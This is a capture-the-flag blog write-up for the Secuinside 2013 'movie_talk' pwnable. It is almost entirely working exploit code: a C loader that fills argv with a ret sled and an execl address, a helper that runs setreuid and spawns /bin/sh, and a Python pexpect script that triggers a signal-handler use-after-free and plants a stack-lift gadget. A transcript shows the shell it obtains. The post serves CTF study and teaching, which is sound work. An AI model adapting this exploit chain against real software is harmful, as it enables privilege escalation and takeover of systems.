
Secuinside CTF 2013 Qual - 17. movie_talk (Exploit only)

pwn3r_45 2013. 7. 23. 21:46

Category : Pwnables


movie_talk

 

Summary: signal handler + use-after-free, then lift esp into argv



loader.c 

#include <stdio.h>

/* Filler value that args[0] below is made of: presumably the address of a
 * `ret` instruction in movie_talk's own text (0x0804xxxx is the usual
 * non-PIE 32-bit text range), i.e. a ret sled that a lifted esp can land
 * anywhere in.  TODO confirm against the binary's disassembly. */
#define RET "\xbb\x8b\x04\x08"

/* Sixteen copies of RET; args[0] is built from a long run of these. */
#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET

/* Presumably the address of execl() in the target's libc mapping (name only;
 * it sits in the same 0x400xxxxx region as the exploit's lift_esp gadget)
 * — confirm. */
#define EXECL "\x90\x42\x0e\x40"

/* Address of the bytes "GNU" inside the movie_talk ELF image (the author's
 * own note: &"GNU").  It follows EXECL and a 4-byte "AAAA" return slot in
 * args[0], so presumably it serves as execl()'s path argument: the relative
 * path "GNU" is resolved in the working directory, which is why GNU.c is
 * meant to be built as ./GNU — confirm. */
#define BINARY "\x74\x81\x04\x08" // &"GNU"


char *args[] = {RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 
RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16   
EXECL "AAAA" BINARY, "", "", "", "", "", "", "", "", "", ""};


/*
 * Entry point: replace this process with ./movie_talk, passing the crafted
 * argv (args, above) and the caller's environment through unchanged.
 * argc/argv are unused.  execve() only returns on failure, in which case
 * main() falls off the end with no diagnostic and no return value.
 *
 * NOTE(review): execve() is declared in <unistd.h>, which is not included
 * here (only <stdio.h> is), so it is implicitly declared.  Also, args[] as
 * initialized above ends with "" and has no terminating NULL pointer, which
 * execve() requires; the array relies on whatever follows it in memory
 * being zero.
 */
int main(int argc, char **argv, char **envp)

{

/* Hand control to the target with our argv; nothing after this runs unless
 * the exec fails. */
execve("./movie_talk",args, envp);

}



GNU.c

#include <stdio.h>


/*
 * Program the chain ends up exec'ing (loader.c's argv points execl at the
 * relative path "GNU", so this is meant to be built as ./GNU).  It sets the
 * real uid to the current effective uid so that the shell started next does
 * not drop an inherited effective uid, then replaces itself with /bin/sh.
 * The transcript at the end of the page shows the resulting `id` output.
 *
 * NOTE(review): setreuid(), geteuid() and execl() are declared in
 * <unistd.h>, which is not included.  The trailing `0` in the execl() call
 * is an int where a (char *)NULL terminator is expected; that happens to be
 * the same width on the 32-bit target but is not portable.  execl() only
 * returns on failure, and main() then ends without a return value.
 */
int main()

{

/* Real uid := effective uid, so a subsequent shell keeps the effective id. */
setreuid(geteuid(), geteuid());

/* Replace this process with an interactive shell. */
execl("/bin/sh","sh",0);

}



Exploit

#!/usr/bin/python


from struct import pack

import os

import pexpect

import time


# Exploit driver for the movie_talk challenge: it drives the program's text
# menu through a pty.  The menu numbers and per-entry prompts it answers are
# the ones visible in the session transcript at the end of the page
# (1 = movie addition, 3 = my movie list; each addition asks for
# "movie name", "rating [1-100]" and "film rate [0,12,15,19]").
#
# Python 2 only: struct.pack() returns str here, so p(...) + "a"*14 below is
# str + str; under Python 3 it would be bytes + str and raise TypeError.

# Pack an int as a 32-bit little-endian value (x86 pointer width).
p = lambda x : pack("<L", x)


# Address of a stack-lifting gadget in the target (the author's disassembly
# is in the inline comment).  The page summary says esp is lifted into argv,
# which loader.c fills with a long RET sled ending in EXECL "AAAA" BINARY.
# The value is specific to the author's challenge build.
lift_esp = 0x400878c2    # add $0x81bc,%esp;  ret;


# loader execve()s ./movie_talk with the crafted argv (see loader.c above).
pp = pexpect.spawn("/home/movie_talk/loader")

# NOTE(review): ".*" also matches the empty string, so expect() returns at
# once; these calls only drain whatever output is pending and never wait for
# a prompt.  The fixed sleep further down is the only real pacing here.
pp.expect(".*")

# First entry: menu 1 (movie addition), then name, rating, film rate.
pp.sendline("1")

pp.sendline("movie1")

pp.sendline("1")

pp.sendline("0")


pp.expect(".*")

# Second entry, same sequence.
pp.sendline("1")

pp.sendline("movie2")

pp.sendline("1")

pp.sendline("0")


# Let the two additions land, then deliver SIGQUIT (signal 3) to the child.
# The page summary names a signal handler and a use-after-free: presumably
# the handler frees an entry without clearing the pointer to it — confirm
# against the binary.  (Defensively, this is the classic reason a handler
# should only set a flag: free() is not async-signal-safe, and freeing in a
# handler leaves dangling state behind for the main flow to trip over.)
time.sleep(4)

# NOTE(review): os.kill(pp.pid, signal.SIGQUIT) would do the same without a
# shell round-trip (needs `import signal`).
os.system("kill -3 %d" %pp.pid)


pp.expect(".*")

# Third entry: the name is the 4-byte gadget address plus 14 filler bytes
# (18 bytes in total).  Presumably this allocation reuses the chunk freed by
# the handler, so the stale entry now begins with lift_esp — TODO confirm the
# allocation sizes against the binary.
pp.sendline("1")

pp.sendline(p(lift_esp)+"a"*14)

pp.sendline("1")

pp.sendline("0")


pp.expect(".*")

# Menu 3 (my movie list) walks the entries, the stale one included;
# presumably that is where control transfers to lift_esp — confirm.
pp.sendline("3")

# Hand the pty to the user; the transcript below shows the shell that results.
pp.interact()



root@ubuntu:/home/movie_talk# ulimit -s unlimited

root@ubuntu:/home/movie_talk# ./exploit.py 

3

movie name: rating [1-100]: film rate [0,12,15,19]: 1. movie addtion

2. movie deletion

3. my movie list

4. quit

: [*] movie list =>

$ id

uid=1016(movie_talk) gid=0(root) egid=1016(movie_talk) groups=1016(movie_talk),0(root)

$